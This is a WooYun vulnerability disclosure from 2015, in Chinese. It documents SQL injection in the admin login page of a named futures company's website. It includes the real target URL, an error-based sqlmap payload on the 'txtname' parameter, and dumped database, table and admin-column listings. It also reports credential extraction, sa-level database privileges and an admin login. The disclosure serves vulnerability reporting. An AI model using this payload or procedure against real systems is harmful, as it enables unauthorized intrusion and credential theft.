当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152075

漏洞标题:通惠期货后台登录处存在SQL注入漏洞

相关厂商:通惠期货有限公司

漏洞作者: Nelion

提交时间:2015-11-05 17:56

修复时间:2015-12-20 17:58

公开时间:2015-12-20 17:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

在后台登录窗口(http://www.tlqh.com.cn/manager/Login.aspx)处用burp抓一下包,保存一下放入sql里面跑。

漏洞证明:

1、看一下都有哪些数据库:

Parameter: txtname (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __VIEWSTATE=/wEPDwUKLTUwOTQ0NDQ3MWRkG4evLtrTgC3zhxkpHqYKHwmg4AA=&__
VIEWSTATEGENERATOR=6942E586&__EVENTVALIDATION=/wEWBAL1uKqqAgLEhISACwKd+7q4BwKp8p
n0BZ2S3vC+NXfN7AJV6RSr9xcmsIso&txtname=admin' AND 3221=CONVERT(INT,(SELECT CHAR(
113)+CHAR(106)+CHAR(113)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3221=3221) THEN
CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(106)+CHAR(113))
)-- SziJ&txtpwd=123456&tijiao=
-----------
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008


available databases [7]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] tonglianQH


2、当前库是tonglianQH,看一下该库中的表:

Database: tonglianQH
[20 tables]
+------------------+
| B_Admin |
| B_Keyword |
| B_PageMenu |
| B_PagePower |
| B_RolePower |
| B_RolePower |
| B_SEOInfo |
| ShaoMiaoType |
| Web_AboutMenu |
| Web_Case |
| Web_CaseType |
| Web_IndexImg |
| Web_Job |
| Web_MenuPage |
| Web_Message |
| Web_News |
| Web_NewsType |
| Web_ShaoMiaoCase |
| Web_YRZZImg |
| web_link |
+------------------+


3、再看一下这个B_Admin表中的字段:

Database: tonglianQH
Table: B_Admin
[11 columns]
+---------------+----------+
| Column | Type |
+---------------+----------+
| AID | int |
| CDate | datetime |
| ISDelete | int |
| ISLock | int |
| LastLoginDate | datetime |
| LastLoginIP | varchar |
| LoginName | varchar |
| LoginTime | int |
| Name | varchar |
| Password | varchar |
| RID | int |
+---------------+----------+


4、看一下Name,LoginName,Password字段的内容:(还是截个图吧,不然我不好打码~~~)

1.png


5、顺便提一下,数据库用户是sa,权限挺高的:

3.png


6、用这信息在后台登录一下管理员用户:(后台:http://www.tlqh.com.cn/manager/Login.aspx)

2.png

修复方案:

过滤一下参数;
而且后台的密码也挺弱的。

版权声明:转载请注明来源 Nelion@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝